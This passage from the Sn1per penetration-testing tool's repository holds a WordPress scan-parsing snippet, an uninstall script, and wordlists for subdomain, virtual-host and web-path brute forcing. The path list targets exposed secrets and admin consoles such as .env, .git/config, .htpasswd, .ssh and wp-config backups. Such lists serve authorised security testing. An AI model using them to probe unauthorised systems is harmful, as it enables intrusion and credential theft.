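grep -E "$GREP_OPTIONS" "$MATCH" "$FILENAME" 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' >> "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null

# "[+]" lines are reported as P5 (informational); field 1 (typically the "[+]" marker) is dropped.
MATCH="[+]"
grep -E "$GREP_OPTIONS" "$MATCH" "$FILENAME" 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' >> "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null

# Print the collected findings for this template.
cat "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
--------------------------------------------------------------------------------
/uninstall.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Uninstall script for Sn1per
# Created by @xer0dayz - https://sn1persecurity.com

# Removing the install tree under /usr/share and the /usr/bin launcher requires root.
if [[ $EUID -ne 0 ]]; then
    echo "This script must be run as root"
    exit 1
fi

# VARS
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'

echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://sn1persecurity.com$RESET"
echo ""

INSTALL_DIR=/usr/share/sniper

echo -e "$OKRED[>]$RESET This script will uninstall sniper and remove ALL files under $INSTALL_DIR. Are you sure you want to continue?$RESET"
read -r answer

# Only a "y"/"yes" answer proceeds; the original script prompted but then deleted regardless
# of what was typed, so a stray Enter (or an empty stdin) would wipe the install tree.
case "$answer" in
    [yY]|[yY][eE][sS]) ;;
    *)
        echo -e "$OKBLUE[*]$RESET Aborted.$RESET"
        exit 0
        ;;
esac

# Use the same INSTALL_DIR that was shown in the prompt rather than a second hard-coded path.
rm -Rf "$INSTALL_DIR/"
rm -f /usr/bin/sniper

echo -e "$OKBLUE[*]$RESET Done!$RESET"
--------------------------------------------------------------------------------
/wordlists/altdns.txt:
--------------------------------------------------------------------------------
1 | 1 2 | 10 3 | 11 4 | 12 5 | 13 6 | 14 7 | 15 8 | 16 9 | 17 10 | 18 11 | 19 12 | 2 13 | 20 14 | 2009 15 | 2010 16 | 2011 17 | 2012 18 | 2013 19 | 2014 20 | 2015 21 | 2016 22 | 3 23 | 4 24 | 5 25 | 6 26 | 7 27 | 8 28 | 9 29 | a 30 | acc 31 | accept 32 | accounts 33 | adm 34 | admin 35 | admin1 36 | administrator 37 | akali 38 | akamai 39 | alpha 40 | alt 41 | america 42 | analytics 43 | api 44 | api1 45 | api-docs 46 | apollo 47 | april 48 | aws 49 | b 50 | backend 51 | beta 52 | billing 53 | boards 54 | box 55 | brand 56 | brasil 57 | brazil 58 | bucket 59 | bucky 60 | c 61 | cdn 62 | cf 63 | chef 64 | ci 65 | client 66 | cloudfront 67 | cms 68 | cms1 69 | cn 70 | com 71 | confluence 72 | container 73 | control 74 | data 75 | dec 76 | demo 77 | dev 78 | dev1 79 | developer 80 | devops 81 | docker 82 | docs 83 | drop 84 | edge 85 | elasticbeanstalk 86 | elb 87 | email 88 | eng 89 | engima 90 | engine 91 | engineering 92 | eu 93 | europe 94 | europewest 95 | euw 96 | euwe 97 | evelynn 98 | events 99 | feb 100 | fet 101 | firewall 102 | forms 103 | forum 104 | frontpage 105 | fw 106 | games 107 | germany 108 | gh 109 | ghcpi 110 | git 111 | github 112 | global 113 | hkg 114 | hw 115 | hwcdn 116 | i 117 | ids 118 | int 119 | internal 120 | jenkins 121 | jinx 122 | july 123 | june 124 | kor 125 | korea 126 | kr 127 | lan 128 | las 129 | latin 130 | latinamerica 131 | lax 132 | lax1 133 | lb 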
134 | loadbalancer 135 | login 136 | machine 137 | mail 138 | march 139 | merch 140 | mirror 141 | na 142 | nautilus 143 | net 144 | netherlands 145 | nginx 146 | nl 147 | node 148 | northamerica 149 | nov 150 | oceania 151 | oct 152 | ops 153 | org 154 | origin 155 | page 156 | pantheon 157 | pass 158 | pay 159 | payment 160 | pc 161 | php 162 | pl 163 | poland 164 | preferences 165 | priv 166 | private 167 | prd 168 | prod 169 | production 170 | profile 171 | profiles 172 | promo 173 | promotion 174 | proxy 175 | redirector 176 | region 177 | repo 178 | repository 179 | reset 180 | restrict 181 | restricted 182 | reviews 183 | s 184 | s3 185 | sandbox 186 | search 187 | secure 188 | security 189 | sept 190 | server 191 | service 192 | singed 193 | skins 194 | spring 195 | ssl 196 | staff 197 | stage 198 | stage1 199 | staging 200 | static 201 | support 202 | swagger 203 | system 204 | t 205 | train 206 | training 207 | team 208 | test 209 | test1 210 | testbed 211 | testing 212 | testing1 213 | tomcat 214 | tpe 215 | tr 216 | trial 217 | tur 218 | turk 219 | turkey 220 | twitch 221 | uat 222 | v1 223 | v2 224 | vi 225 | vpn 226 | w3 227 | www 228 | www3 229 | web 230 | web1 231 | webapp 232 | westeurope 233 | z 234 | -------------------------------------------------------------------------------- /wordlists/vhosts.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1 2 | admin 3 | administration 4 | ads 5 | adserver 6 | alerts 7 | alpha 8 | ap 9 | apache 10 | api 11 | app 12 | apps 13 | appserver 14 | aptest 15 | auth 16 | backup 17 | beta 18 | blog 19 | cdn 20 | chat 21 | citrix 22 | cms 23 | corp 24 | crs 25 | cvs 26 | dashboard 27 | database 28 | db 29 | demo 30 | dev 31 | devel 32 | development 33 | devsql 34 | devtest 35 | dhcp 36 | direct 37 | dmz 38 | dns 39 | dns0 40 | dns1 41 | dns2 42 | download 43 | en 44 | erp 45 | eshop 46 | exchange 47 | f5 48 | fileserver 49 | firewall 50 | forum 51 | ftp 52 | ftp0 53 | 
git 54 | gw 55 | help 56 | helpdesk 57 | home 58 | host 59 | http 60 | id 61 | images 62 | info 63 | internal 64 | internet 65 | intra 66 | intranet 67 | ipv6 68 | lab 69 | ldap 70 | linux 71 | local 72 | localhost 73 | log 74 | m 75 | mail 76 | mail2 77 | mail3 78 | mailgate 79 | main 80 | manage 81 | mgmt 82 | mirror 83 | mobile 84 | monitor 85 | mssql 86 | mta 87 | mx 88 | mx0 89 | mx1 90 | mysql 91 | news 92 | noc 93 | ns 94 | ns0 95 | ns1 96 | ns2 97 | ns3 98 | ntp 99 | old 100 | ops 101 | oracle 102 | owa 103 | pbx 104 | portal 105 | s3 106 | secure 107 | server 108 | sharepoint 109 | shop 110 | sip 111 | smtp 112 | sql 113 | squid 114 | ssh 115 | ssl 116 | stage 117 | staging 118 | stats 119 | status 120 | svn 121 | syslog 122 | test 123 | test1 124 | test2 125 | testing 126 | uat 127 | upload 128 | v1 129 | v2 130 | v3 131 | vm 132 | vnc 133 | voip 134 | vpn 135 | web 136 | web2test 137 | whois 138 | wiki 139 | www 140 | www2 141 | xml -------------------------------------------------------------------------------- /wordlists/web-brute-stealth.txt: -------------------------------------------------------------------------------- 1 | $defaultview?Readviewentries 2 | actuator/env 3 | actuator/health 4 | AddressBookJ2WB 5 | AddressBookJ2WE/services/AddressBook 6 | admin 7 | Admin 8 | admin-console 9 | administrator 10 | AlbumCatalogWeb 11 | api 12 | AppManagementStatus 13 | asynchPeople/ 14 | .bak 15 | .bashrc 16 | blog 17 | .bzr 18 | CFIDE 19 | CFIDE/administrator/aboutcf.cfm 20 | CFIDE/administrator/enter.cfm 21 | CFIDE/administrator/index.cfm 22 | CFIDE/administrator/welcome.cfm 23 | cgi-bin 24 | clientaccesspolicy.xml 25 | composer.json 26 | computer/ 27 | crossdomain.xml 28 | css 29 | .csv 30 | data 31 | deployment-config.json 32 | dispatcher/invalidate.cache 33 | Dockerfile 34 | .DS_Store 35 | elmah.axd 36 | en-US/splunkd/__raw/services/server/info/server-info?output_mode=json 37 | .env 38 | env 39 | errorlog.axd 40 | .ftpconfig 41 | ftpsync.settings 42 | 
.git 43 | .git/config 44 | .gitignore 45 | global-protect/portal/css/login.css 46 | gulpfile.js 47 | heapdump 48 | .hg 49 | home 50 | host-manager/html 51 | .htaccess 52 | .htaccess.bak 53 | .htpasswd 54 | images 55 | img 56 | index 57 | index.asp 58 | index.aspx 59 | index.htm 60 | index.html 61 | index.jsp 62 | index.php 63 | invoker/EJBInvokerServlet 64 | invoker/JMXInvokerServlet 65 | jmx-console 66 | jmx-console/HtmlAdaptor 67 | js 68 | lbs 69 | Makefile 70 | ;/..;/manager 71 | manager/html 72 | package.json 73 | phpinfo.php 74 | phpmyadmin 75 | phpMyAdmin 76 | phpMyAdmin/scripts/setup.php 77 | portal 78 | portal/info.jsp 79 | pview/ 80 | readme.md 81 | readme.txt 82 | register/check/username?username=thisaccountdoesntexist 83 | .remote-sync.json 84 | robots.txt 85 | script 86 | scripts 87 | secure/ManageFilters.jspa 88 | securityRealm/createAccount 89 | server-info 90 | server-manager/html 91 | server-status 92 | sftp-config.json 93 | signup 94 | sitemap.xml 95 | .ssh 96 | status 97 | .svn 98 | systemInfo 99 | test 100 | tomcat/manager/html 101 | trace 102 | Trace.axd 103 | .travis.yml 104 | upload 105 | uploads 106 | user 107 | userContent/ 108 | users 109 | view/All/builds 110 | view/All/newjob 111 | .vscode/ftp-sync.json 112 | .vscode/sftp.json 113 | _vti_bin/ 114 | _vti_bin/sites.asmx?wsdl 115 | _vti_bin/spsdisco.aspx 116 | _vti_inf.html 117 | _vti_pvt/service.cnf 118 | web.config 119 | web-console 120 | web-console/Invoker 121 | webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate 122 | webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate 123 | wls-wsat/CoordinatorPortType 124 | wls-wsat/CoordinatorPortType11 125 | wls-wsat/ParticipantPortType 126 | wls-wsat/ParticipantPortType11 127 | wls-wsat/RegistrationPortTypeRPC 128 | wls-wsat/RegistrationPortTypeRPC11 129 | wls-wsat/RegistrationRequesterPortType 130 | wls-wsat/RegistrationRequesterPortType11 131 | wordpress 132 | wp 133 | 
wp-admin 134 | wp-config.php~ 135 | wp-content/plugins/easy-wp-smtp/ 136 | wp-content/plugins/easy-wp-smtp/css/style.css 137 | wp-content/plugins/easy-wp-smtp/inc/ 138 | wp-content/plugins/easy-wp-smtp/readme.txt 139 | wp-json/wp/v2/users 140 | wp-login.php?action=register 141 | xmlrpc.php 142 | --------------------------------------------------------------------------------